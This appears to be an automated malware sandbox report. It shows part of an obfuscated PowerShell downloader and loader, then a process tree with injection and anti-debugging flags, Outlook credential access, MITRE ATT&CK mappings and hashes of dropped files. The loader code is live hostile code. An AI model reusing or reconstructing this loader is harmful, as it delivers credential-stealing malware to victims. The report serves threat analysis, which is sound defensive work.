AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
      4⤵
      Network Service Discovery
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2060
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

Network Service Discovery

1

T1046

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
761ca8cbffa94184d02bbd3452b020a1

SHA1
1da9983a4fd33afc81fc1d49e04452a57ae99f0f

SHA256
5459fd18e17f728cc84a3dd74aeb86b424b9b20b27446291a6cfb6a67611e0c0

SHA512
0db05311071961af0c0cd34d313d0d6f329008410cea8a27c16e94f3beddb92b0a5a5060b6044e6f10c5f8028b43cfcad4a33fae9e13137fc402ef980fc9dcb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBE90.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar513D.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Hygrophthalmic.dis

Filesize
474KB

MD5
a79506f805546d94c4280f98dcdd84a8

SHA1
b641bc5daef6955be1a63bfe38c6a941e3cab344

SHA256
a297eab229c20b75972e29a8ed769faeede656a3ab7e6646c19fd7a33eb7e633

SHA512
2082aa32a661c677014bfdd04b2ed24b9a04cc45295ce61a12b35dff6deccbeade24f6f78e5682768fb48a98337c8fd61c6b6bff6066f770ced3d399d602b8ec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EO0YPDAG8Y4NJRRD8MP4.temp

Filesize
7KB

MD5
feb408063f07826a40b69810189a0141

SHA1
0ff6d855acdc35c0a99bbc6bf235f700e8985b03

SHA256
41714d52b01e561d1683d7f91bf615bd61dae63d152f44b1a2aa6e0177e70b92

SHA512
74c24b7da7d621ecb29901f2c911fd4d08a8c21f3b108961ecf8a5edd9225191e07a3fc3c091636b22aeb8f14158215f87cfeb47934bb8e9414297405bfd9588

Download Submit
memory/1712-29-0x000007FEF62FE000-0x000007FEF62FF000-memory.dmp

Filesize
4KB

Download
memory/1712-22-0x00000000002D0000-0x00000000002D8000-memory.dmp

Filesize
32KB

Download
memory/1712-28-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-26-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-31-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-25-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-24-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-20-0x000007FEF62FE000-0x000007FEF62FF000-memory.dmp

Filesize
4KB

Download
memory/1712-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/1712-23-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-27-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/1712-63-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/2632-36-0x0000000006580000-0x000000000888E000-memory.dmp

Filesize
35.1MB

Download
memory/2904-61-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2904-62-0x0000000000590000-0x000000000289E000-memory.dmp

Filesize
35.1MB

Download
memory/2904-37-0x0000000000590000-0x000000000289E000-memory.dmp

Filesize
35.1MB

Download

Analysis

Sharing